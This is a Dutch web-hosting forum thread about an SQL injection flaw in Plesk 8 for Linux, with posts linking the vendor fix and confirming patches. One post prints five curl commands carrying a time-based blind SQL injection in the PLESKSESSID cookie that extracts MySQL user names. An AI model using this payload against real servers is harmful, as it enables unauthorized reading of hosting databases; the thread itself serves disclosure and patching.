Likes Likes:  0
Resultaten 1 tot 5 van de 5
  1. #1
    SQL injection vulnerability within Plesk for Linux/Unix.
    [--]
    854 Berichten
    Ingeschreven
    28/05/06

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    67 Berichten zijn liked


    Naam: R
    Registrar SIDN: ja
    KvK nummer: 20125757

    Thread Starter

    SQL injection vulnerability within Plesk for Linux/Unix.

    A security breach has currently made all versions of Plesk 8 for Linux Server vulnerable to an SQL injection.
    Plesk versions 7.5.4 and 8.1.1 are not affected by this vulnerability

    FIX: http://kb.swsoft.com/en/2169

    (vreemd overigens dat deze fix nog niet via de auto-updater beschikbaar is)

  2. #2
    SQL injection vulnerability within Plesk for Linux/Unix.
    geregistreerd gebruiker
    849 Berichten
    Ingeschreven
    26/12/03

    Locatie
    Zwolle

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Naam: Daniël
    Registrar SIDN: Nee
    Ondernemingsnummer: nvt

    Net even een aantal 8.2.0 server lopen patchen, SQL injection is niet zo mooi natuurlijk Iemand meer info over hoe ze die SQL injection doen dan?

  3. #3
    SQL injection vulnerability within Plesk for Linux/Unix.
    geregistreerd gebruiker
    961 Berichten
    Ingeschreven
    02/05/04

    Locatie
    Montreal, Canada

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: Ja
    KvK nummer: nvt
    Ondernemingsnummer: 873411853

    Vrij ernstig:

    1) Delay=5224.3877
    Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,1,1)=char(97),BENCHMARK(3000000,MD 5(CHAR(1))),null),2,3
    from mysql.user/*"

    2) Delay=5165.3031
    Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,2,1)=char(100),BENCHMARK(3000000,M D5(CHAR(1))),null),2,3
    from mysql.user/*"

    3) Delay=5158.9512
    Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,3,1)=char(109),BENCHMARK(3000000,M D5(CHAR(1))),null),2,3
    from mysql.user/*"

    4) Delay=5224.0980
    Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,4,1)=char(105),BENCHMARK(3000000,M D5(CHAR(1))),null),2,3
    from mysql.user/*"

    5) Delay=5241.5251
    Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
    "PLESKSESSID=1' union select if
    (substring(user,5,1)=char(110),BENCHMARK(3000000,M D5(CHAR(1))),null),2,3
    from mysql.user/*"

    Zo kon je alle data uit de plesk database lezen...

  4. #4
    SQL injection vulnerability within Plesk for Linux/Unix.
    [--]
    854 Berichten
    Ingeschreven
    28/05/06

    Locatie
    Eindhoven

    Post Thanks / Like
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    67 Berichten zijn liked


    Naam: R
    Registrar SIDN: ja
    KvK nummer: 20125757

    Thread Starter
    Inmiddels ook aanwezig als hotfix in de auto-update..
    http://www.swsoft.com/en/download/plesk/patches/

  5. #5
    SQL injection vulnerability within Plesk for Linux/Unix.
    moderator
    18.077 Berichten
    Ingeschreven
    02/06/04

    Locatie
    Breda

    Post Thanks / Like
    Mentioned
    13 Post(s)
    Tagged
    0 Thread(s)
    53 Berichten zijn liked


    Naam: Berrie Pelser
    Bedrijf: Ber|Art
    Functie: Founder/CEO
    URL: berart.nl
    KvK nummer: 52138917
    View berriepelser's profile on LinkedIn

    Thx! alles was al wel gepatched maar goed, nu ook automatisch...
    Berrie Pelser, Ber|Art Visual Design V.O.F. Managed Secure WordPress SEO Cloud Hosting met Zoekmachine Optimalisatie en Social Media Strategie

Labels voor dit Bericht

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2026 Webhostingtalk.nl.
Web Statistics